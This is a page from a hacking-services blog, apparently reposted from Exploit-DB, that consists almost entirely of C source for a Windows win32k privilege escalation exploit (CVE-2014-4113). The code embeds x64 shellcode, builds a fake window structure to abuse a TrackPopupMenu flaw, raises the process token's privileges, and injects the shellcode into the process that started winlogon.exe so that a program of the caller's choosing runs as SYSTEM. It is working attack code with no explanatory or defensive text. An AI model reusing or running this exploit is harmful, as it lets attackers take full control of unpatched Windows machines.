Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86385716

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#include "hd.h"

// EDB Note ~ Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46945.rar


byte __s_code[]={
	0x48 ,0x8B ,0xC4 ,0x48 ,0x89 ,0x58 ,0x08 ,0x48 ,0x89 ,0x68 ,0x20 ,0x56 ,0x57 ,0x41 ,0x56 ,0x48 ,
	0x81 ,0xEC ,0xE0 ,0x00 ,0x00 ,0x00 ,0x45 ,0x33 ,0xF6 ,0x49 ,0x89 ,0xCB ,0x4C ,0x89 ,0x70 ,0x18 ,
	0x4C ,0x89 ,0x70 ,0x10 ,0x90 ,0x65 ,0x48 ,0x8B ,0x04 ,0x25 ,0x30 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8B ,
	0x40 ,0x60 ,0x90 ,0x90 ,0x90 ,0x90 ,0x48 ,0x8B ,0x78 ,0x18 ,0x48 ,0x8B ,0x47 ,0x10 ,0x48 ,0x83 ,
	0xC7 ,0x10 ,0x48 ,0x3B ,0xC7 ,0x0F ,0x84 ,0x99 ,0x01 ,0x00 ,0x00 ,0x48 ,0xBB ,0x65 ,0x00 ,0x6C ,
	0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x48 ,0xBE ,0x2E ,0x00 ,0x64 ,0x00 ,0x6C ,0x00 ,0x6C ,0x00 ,0x49 ,
	0xBA ,0x6B ,0x00 ,0x65 ,0x00 ,0x72 ,0x00 ,0x6E ,0x00 ,0x48 ,0xBD ,0x4B ,0x00 ,0x45 ,0x00 ,0x52 ,
	0x00 ,0x4E ,0x00 ,0x49 ,0xB8 ,0x45 ,0x00 ,0x4C ,0x00 ,0x33 ,0x00 ,0x32 ,0x00 ,0x49 ,0xB9 ,0x2E ,
	0x00 ,0x44 ,0x00 ,0x4C ,0x00 ,0x4C ,0x00 ,0x66 ,0x0F ,0x1F ,0x84 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,
	0x66 ,0x83 ,0x78 ,0x58 ,0x18 ,0x48 ,0x8B ,0x48 ,0x60 ,0x72 ,0x25 ,0x48 ,0x8B ,0x11 ,0x49 ,0x3B ,
	0xD2 ,0x75 ,0x0C ,0x48 ,0x39 ,0x59 ,0x08 ,0x75 ,0x06 ,0x48 ,0x39 ,0x71 ,0x10 ,0x74 ,0x1E ,0x48 ,
	0x3B ,0xD5 ,0x75 ,0x0C ,0x4C ,0x39 ,0x41 ,0x08 ,0x75 ,0x06 ,0x4C ,0x39 ,0x49 ,0x10 ,0x74 ,0x0D ,
	0x48 ,0x8B ,0x00 ,0x48 ,0x3B ,0xC7 ,0x75 ,0xC8 ,0xE9 ,0x17 ,0x01 ,0x00 ,0x00 ,0x48 ,0x8B ,0x78 ,
	0x30 ,0x48 ,0x85 ,0xFF ,0x0F ,0x84 ,0x0A ,0x01 ,0x00 ,0x00 ,0x48 ,0x63 ,0x47 ,0x3C ,0xB9 ,0x4D ,
	0x5A ,0x00 ,0x00 ,0x66 ,0x39 ,0x0F ,0x0F ,0x85 ,0xF8 ,0x00 ,0x00 ,0x00 ,0x81 ,0x3C ,0x38 ,0x50 ,
	0x45 ,0x00 ,0x00 ,0x0F ,0x85 ,0xEB ,0x00 ,0x00 ,0x00 ,0x44 ,0x8B ,0x8C ,0x38 ,0x88 ,0x00 ,0x00 ,
	0x00 ,0x49 ,0x8B ,0xD6 ,0x4C ,0x03 ,0xCF ,0x45 ,0x8B ,0x41 ,0x20 ,0x41 ,0x8B ,0x49 ,0x18 ,0x4C ,
	0x03 ,0xC7 ,0x48 ,0x85 ,0xC9 ,0x74 ,0x32 ,0x48 ,0xBB ,0x43 ,0x72 ,0x65 ,0x61 ,0x74 ,0x65 ,0x50 ,
	0x72 ,0x49 ,0xBA ,0x72 ,0x6F ,0x63 ,0x65 ,0x73 ,0x73 ,0x41 ,0x00 ,0x0F ,0x1F ,0x44 ,0x00 ,0x00 ,
	0x41 ,0x8B ,0x04 ,0x90 ,0x48 ,0x39 ,0x1C ,0x38 ,0x75 ,0x07 ,0x4C ,0x39 ,0x54 ,0x38 ,0x07 ,0x74 ,
	0x08 ,0x48 ,0xFF ,0xC2 ,0x48 ,0x3B ,0xD1 ,0x72 ,0xE7 ,0x33 ,0xC0 ,0x48 ,0x3B ,0xD1 ,0x0F ,0x83 ,
	0x92 ,0x00 ,0x00 ,0x00 ,0x41 ,0x8B ,0x49 ,0x24 ,0x45 ,0x33 ,0xC0 ,0x48 ,0x03 ,0xCF ,0x0F ,0xB7 ,
	0x14 ,0x51 ,0x41 ,0x8B ,0x49 ,0x1C ,0x45 ,0x33 ,0xC9 ,0x48 ,0x03 ,0xCF ,0x44 ,0x8B ,0x14 ,0x91 ,
	0x48 ,0x89 ,0x44 ,0x24 ,0x58 ,0x48 ,0x89 ,0x44 ,0x24 ,0x60 ,0x4C ,0x03 ,0xD7 ,0x48 ,0x8D ,0x7C ,
	0x24 ,0x70 ,0xB9 ,0x68 ,0x00 ,0x00 ,0x00 ,0xF3 ,0xAA ,0xB8 ,0x05 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
	0xD3 ,0x66 ,0x89 ,0x84 ,0x24 ,0xB0 ,0x00 ,0x00 ,0x00 ,0x48 ,0x8D ,0x44 ,0x24 ,0x50 ,0x33 ,0xC9 ,
	0x48 ,0x89 ,0x44 ,0x24 ,0x48 ,0x48 ,0x8D ,0x44 ,0x24 ,0x70 ,0x4C ,0x89 ,0x74 ,0x24 ,0x50 ,0x48 ,
	0x89 ,0x44 ,0x24 ,0x40 ,0x4C ,0x89 ,0x74 ,0x24 ,0x38 ,0x4C ,0x89 ,0x74 ,0x24 ,0x30 ,0xC7 ,0x44 ,
	0x24 ,0x28 ,0x10 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x70 ,0x68 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x84 ,
	0x24 ,0xAC ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0xC7 ,0x44 ,0x24 ,0x20 ,0x01 ,0x00 ,0x00 ,
	0x00 ,0x41 ,0xFF ,0xD2 ,0x33 ,0xC0 ,0x4C ,0x8D ,0x9C ,0x24 ,0xE0 ,0x00 ,0x00 ,0x00 ,0x49 ,0x8B ,
	0x5B ,0x20 ,0x49 ,0x8B ,0x6B ,0x38 ,0x49 ,0x8B ,0xE3 ,0x41 ,0x5E ,0x5F ,0x5E ,0xC3
};




HMENU __init_menu(
	)
{
	HMENU hMenu_Ret=NULL;
	MENUITEMINFO mItem={0};

	do 
	{
		HMENU hme=CreatePopupMenu();
		if (hme==NULL){
			printf("CreatePopupMenu()_1 fail:0x%x\n" ,GetLastError());
			break;
		}

		mItem.cbSize=sizeof(MENUITEMINFO);
		mItem.fMask=(MIIM_STRING);

		bool bisok=InsertMenuItem(hme ,0 ,1 ,&mItem);
		if (bisok==false){
			printf("InsertMenuItem()_1 fail:0x%x\n" ,GetLastError());
			break;
		}

		hMenu_Ret=CreatePopupMenu();
		if (hMenu_Ret==NULL){
			printf("CreatePopupMenu()_2 fail:0x%x\n" ,GetLastError());
			break;
		}

		MENUITEMINFO mi={0};
		mi.cbSize=sizeof(mi);
		mi.fMask=(MIIM_STRING|MIIM_SUBMENU);
		mi.hSubMenu=hme;
		mi.dwTypeData="";
		mi.cch=1;

		bisok=InsertMenuItem(hMenu_Ret ,0 ,1 ,&mi);
		if (bisok==false){
			printf("InsertMenuItem()_2 fail: 0x%x\n" ,GetLastError());
		}

	} while (false);

	return hMenu_Ret;
}


PVOID __calc_sep_token_addr(
	)
{
	NTSTATUS status;
	PSYSTEM_HANDLE_INFORMATION handleInfo=NULL;
	ULONGLONG handleInfoSize = 0x10000 ,i ,ret_obj_addr=NULL; 

	do 
	{
		_NtQuerySystemInformation NtQuerySystemInformation = 
			(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");

		_NtDuplicateObject NtDuplicateObject =
			(_NtDuplicateObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtDuplicateObject");

		_NtQueryObject NtQueryObject =
			(_NtQueryObject)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQueryObject");


		if (!NtQuerySystemInformation || !NtDuplicateObject || !NtQueryObject){
			printf("get sys proc failed!\n");
			break;
		}

		handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);

		while ((status = NtQuerySystemInformation(SystemHandleInformation,handleInfo,
			handleInfoSize,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
			handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);

		if (!NT_SUCCESS(status)){
			printf("NtQuerySystemInformation failed!\n");
			break;
		}


		POBJECT_TYPE_INFORMATION objectTypeInfo=(POBJECT_TYPE_INFORMATION)malloc(0x1000);

		for (i = 0; i < handleInfo->HandleCount; i++)
		{
			SYSTEM_HANDLE handle = handleInfo->Handles[i];

			if (handle.ProcessId != GetCurrentProcessId())
				continue;

			if (!NT_SUCCESS(NtQueryObject(
				(HANDLE)handle.Handle,
				ObjectTypeInformation,
				objectTypeInfo,
				0x1000,
				NULL
				)))
			{
				printf("[%#x] Error!\n", handle.Handle);
				continue;
			}

			if (objectTypeInfo->Name.Buffer==NULL || objectTypeInfo->Name.Length==0)
				continue;

			if (wcscmp(objectTypeInfo->Name.Buffer ,L"Token"))
				continue;

			ret_obj_addr=((ULONGLONG)handle.Object+0x40);
		}

		if (objectTypeInfo)
			free(objectTypeInfo);

		if (handleInfo)
			free(handleInfo);

	} while (false);

	return (PVOID)ret_obj_addr;
}


ULONGLONG __calc_pid(
	)
{
	NTSTATUS status;
	PSYSTEM_PROCESS_INFORMATION PsInfo=NULL;
	ULONGLONG PsInfoSize = 0x10000 ,ret_pid=NULL; 

	do 
	{
		_NtQuerySystemInformation NtQuerySystemInformation = 
			(_NtQuerySystemInformation)GetProcAddress(LoadLibrary("ntdll.dll"), "NtQuerySystemInformation");


		if (!NtQuerySystemInformation){
			printf("get sys proc failed!\n");
			break;
		}

		PsInfo = (PSYSTEM_PROCESS_INFORMATION)malloc(PsInfoSize);

		while ((status = NtQuerySystemInformation(SystemProcessesAndThreadsInformation,PsInfo,
			PsInfoSize ,NULL)) == STATUS_INFO_LENGTH_MISMATCH)
			PsInfo = (PSYSTEM_PROCESS_INFORMATION)realloc(PsInfo, PsInfoSize*= 2);

		if (!NT_SUCCESS(status)){
			printf("NtQuerySystemInformation failed!\n");
			break; 
		}

		for (;PsInfo->NextEntryDelta ;PsInfo = (PSYSTEM_PROCESS_INFORMATION)((ULONGLONG)PsInfo + PsInfo->NextEntryDelta))
		{
			if (PsInfo->ProcessName.Buffer==NULL || PsInfo->ProcessName.Length==0)
				continue;

			if (!wcscmp(PsInfo->ProcessName.Buffer ,L"winlogon.exe")){
				ret_pid=PsInfo->InheritedFromProcessId;
				break;
			}
		}

	} while (false);

	return ret_pid;
} 


ULONGLONG __init_fake_wnd_pti(
	)
{
	ULONGLONG ret_pti=NULL;
	ULONGLONG dst_proc_addr=NULL;

	do 
	{
		ret_pti=(ULONGLONG)malloc(0x500);
		if (ret_pti==NULL){
			printf("malloc fail!\n");
			return NULL; 
		}

		*(ULONGLONG*)(ret_pti+_oft_win32ps_pti)=0;  //Win32Process
		*(DWORD*)(ret_pti+_oft_0420h_pti)=0;		//not 0x20
		*(ULONGLONG*)(ret_pti+_oft_list_header_pti)=(ULONGLONG)__calc_sep_token_addr()-0x5;  //TODO:

		void* tmpbuf=malloc(0x100); 
		memset(tmpbuf ,0 ,0x100);
		*(ULONGLONG*)(ret_pti+_oft_0188h_pti)=(ULONGLONG)tmpbuf; //buf addr(size >= 0x12) ,check in win32k!SetWakeBit

	} while (false);

	return ret_pti;
}



bool __init_fake_tagWnd(
	)
{
	bool bRet=false;
	_ZwAllocateVirtualMemory_pt pfn_ZwAllocateVm=NULL;

	do 
	{
		HMODULE hmd=LoadLibrary("ntdll.dll");
		if (hmd==NULL)
			break;

		ULONGLONG fake_tagwnd_pti=__init_fake_wnd_pti();
		if (fake_tagwnd_pti==NULL){
			printf("__calc_wnd_pti() fail!\n");
			break;
		}


		pfn_ZwAllocateVm=(_ZwAllocateVirtualMemory_pt)GetProcAddress(hmd ,"ZwAllocateVirtualMemory");
		if (pfn_ZwAllocateVm==NULL){
			printf("pfn ZwAllocateVirtualMemery addr is NULL!\n");
			break;
		}

		BYTE* fake_tagWnd_addr=(BYTE*)0xFFFFFFFB; size_t region_size=0x20000;
		NTSTATUS status=pfn_ZwAllocateVm(GetCurrentProcess() ,(PVOID*)&fake_tagWnd_addr ,0 ,&region_size,
			MEM_RESERVE | MEM_COMMIT|MEM_TOP_DOWN ,PAGE_EXECUTE_READWRITE);

		if (status < 0){
			printf("Allocate fake tagWnd fail!\n");
			break;;
		}

		ULONGLONG ul_align=0xFFFFFFFBLL-(ULONGLONG)fake_tagWnd_addr;
		if (ul_align > 0x10000){
			printf("alloc fake fail: %x!\n" ,fake_tagWnd_addr);
			break;
		}

		memset(fake_tagWnd_addr+ul_align ,0 ,0x1000);

		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_idx_tagWND)=0x0;
		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_pti_tagWnd)=fake_tagwnd_pti; //oft 0x170 == win32process
		*(ULONGLONG*)(fake_tagWnd_addr+ul_align+_oft_18h_tagWnd)=0x0; //0 ,check in IsWindowDesktopComposed

		bRet=true;

	} while (false);

	return bRet;
}



LRESULT __stdcall __wh_wnd_proc( 
	int code, 
	WPARAM wparam,
	LPARAM lparam 
	)
{
	do 
	{
		CWPSTRUCT* lpm=(CWPSTRUCT*)lparam;
		if (lpm->message != MN_FINDWINDOWFROMPOINT || g_bis_mn_findwnded==true)
			break;

		g_bis_mn_findwnded=true;

		UnhookWindowsHook(WH_CALLWNDPROC ,__wh_wnd_proc);

		g_ori_wnd_proc=(WNDPROC)SetWindowLongPtr(lpm->hwnd ,GWLP_WNDPROC ,(LONG_PTR)__wnd_proc_sl);

	} while (false);

	return CallNextHookEx(g_hhk ,code ,wparam ,lparam);
}




LRESULT __wnd_proc_sl( 
	HWND hwnd,
	UINT umsg,
	WPARAM wparam, 
	LPARAM lparam
	)
{
	do 
	{
		if (umsg != MN_FINDWINDOWFROMPOINT )
			break;

		if (g_bis_endmenu)
			break;

		g_bis_endmenu=1;

		EndMenu();
		return 0xFFFFFFFB;

	} while (false);

	return CallWindowProc(g_ori_wnd_proc ,hwnd ,umsg ,wparam ,lparam);
}



LRESULT __stdcall __wnd_proc(
	HWND hwnd, 
	UINT umsg, 
	WPARAM wparam, 
	LPARAM lparam
	)
{
	if (umsg==WM_ENTERIDLE && g_bis_idled==FALSE)
	{
		g_bis_idled=TRUE;
		PostMessage(hwnd ,WM_KEYFIRST ,0x28 ,0);    
		PostMessage(hwnd ,WM_KEYFIRST ,0X27 ,0);   
		PostMessage(hwnd ,WM_LBUTTONDOWN ,0 ,0xff00ff);  
	}

	return DefWindowProc(hwnd ,umsg ,wparam ,lparam);
}


DWORD __stdcall __thread_plroc( 
	void*  param
	)
{
	bool bisok=false;
	WNDCLASS wndcls={0};

	do 
	{
		wndcls.lpfnWndProc=__wnd_proc;
		wndcls.lpszClassName="cve_2014_4113";
		RegisterClass(&wndcls);

		HWND hwnd=CreateWindowEx(0 ,wndcls.lpszClassName ,NULL ,0 ,0 ,0,
			200 ,200 ,NULL ,NULL ,NULL ,NULL);
		if (hwnd==NULL){
			printf("CreateWindowEx() fail: 0x%x\n" ,GetLastError());
			break;
		}

		HMENU hmenu=__init_menu();
		if (hmenu==NULL){
			printf("__init_menu() fail: 0x%x\n" ,GetLastError());
			break;
		}

		
		bool bisok=__init_fake_tagWnd();
		if (bisok==false){
			printf("__init_fake_tagWnd() fail:0x%x\n" ,GetLastError());
			break;
		}
		
		g_hhk=SetWindowsHookEx(WH_CALLWNDPROC ,__wh_wnd_proc ,NULL ,GetCurrentThreadId());
		if (g_hhk==NULL){
			printf("SetWindowsHookEx() fail:0x%x\n" ,GetLastError());
			break;
		}

		bisok=TrackPopupMenu(hmenu ,0 ,0x0FFFFD8F0 ,0x0FFFFD8F0 ,0 ,hwnd ,NULL);
		if (bisok==false){
			printf("TrackPopupMenu() fail:0x%x\n" ,GetLastError());
			break;
		}

		CloseHandle(hmenu);

		DestroyWindow(hwnd);

	} while (FALSE);

	return 0;
}



int main(
	int argc ,char** argv
	)
{
	bool bisok=false;

	do 
	{
		if (argc != 2){
			printf("usage: xxx fpath");
			break;
		}

		HANDLE hProcessToken=NULL ,hRestrictedToken=NULL;
		if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hProcessToken)) {
			printf("Could not open process token\n");
			break; 
		}

		if (!CreateRestrictedToken(hProcessToken, DISABLE_MAX_PRIVILEGE, 0, 0, 0, 0, 0, 0, &hRestrictedToken)){
			printf("Could not create restricted token\n");
			break;
		}

		if (!AdjustTokenPrivileges(hRestrictedToken, TRUE, NULL, 0, NULL, NULL)) {
			printf("Could not adjust privileges\n");
			break;
		}
		
		CloseHandle(hProcessToken);

		HANDLE hthread=CreateThread(NULL ,0 ,__thread_plroc ,NULL ,0 ,NULL);
		if (hthread==NULL){
			printf("CreateThread() fail: 0x%x\n" ,GetLastError());
			break;
		}

		WaitForSingleObject(hthread ,1000);
		TerminateThread(hthread ,0);
		
		if (!ImpersonateLoggedOnUser(hRestrictedToken)){
			printf("ImpersonateLoggedOnUser failed!\n");
			break;
		}
		
		PVOID pfn_cps=GetProcAddress(LoadLibrary("Kernel32.dll") ,"CreateProcessA");
		if (pfn_cps==NULL){
			printf("GetProcess CreateProcessA failed!\n");
			break;
		}
		
		ULONGLONG ul_pid_winlogon=__calc_pid();
		if (ul_pid_winlogon==NULL){
			printf("__calc_winlogon_pid failed!\n");
			break;
		}


		HANDLE hprocess=OpenProcess(PROCESS_ALL_ACCESS ,TRUE ,ul_pid_winlogon);
		if (hprocess==NULL){
			printf("OpenProcess failed: %x\n" ,GetLastError());
			break;
		}


		//init params
		PVOID params=VirtualAllocEx(hprocess ,NULL ,strlen(argv[1])+10 ,MEM_COMMIT ,PAGE_READWRITE);
		if (params==NULL){
			printf("VirtualAllocEx failed:%x\n" ,GetLastError());
			break;
		}

		ULONGLONG ul_ret_wrt=0;
		bisok=WriteProcessMemory(hprocess ,params ,argv[1] ,strlen(argv[1])+2 ,(SIZE_T*)&ul_ret_wrt);
		if (bisok==false || ul_ret_wrt < strlen(argv[1])+2){
			printf("WriteProcessMemory() failed!\n");
			break;
		} 


		//init shellcode

		PVOID shellcode=VirtualAllocEx(hprocess ,NULL ,0x220 ,MEM_COMMIT ,PAGE_EXECUTE_READWRITE);
		if (shellcode==NULL){
			printf("VirtualAllocEx failed:%x\n" ,GetLastError());
			break;
		}

		bisok=WriteProcessMemory(hprocess ,shellcode ,__s_code ,sizeof(__s_code) ,(SIZE_T*)&ul_ret_wrt);
		if (bisok==false || ul_ret_wrt < sizeof(__s_code)){
			printf("WriteProcessMemory() failed!\n");
			break;
		}

		DWORD dw_tid=0;
		HANDLE htd_rmt=CreateRemoteThread(hprocess ,NULL ,0 ,(LPTHREAD_START_ROUTINE )shellcode ,params ,0 ,&dw_tid);
		if (htd_rmt==NULL){
			printf("CreateRemoteThread() fail!\n");
			break;
		}


		//clear

		CloseHandle(htd_rmt);

		CloseHandle(hprocess);

		CloseHandle(hRestrictedToken);

	} while (false);
	
	return 0;
}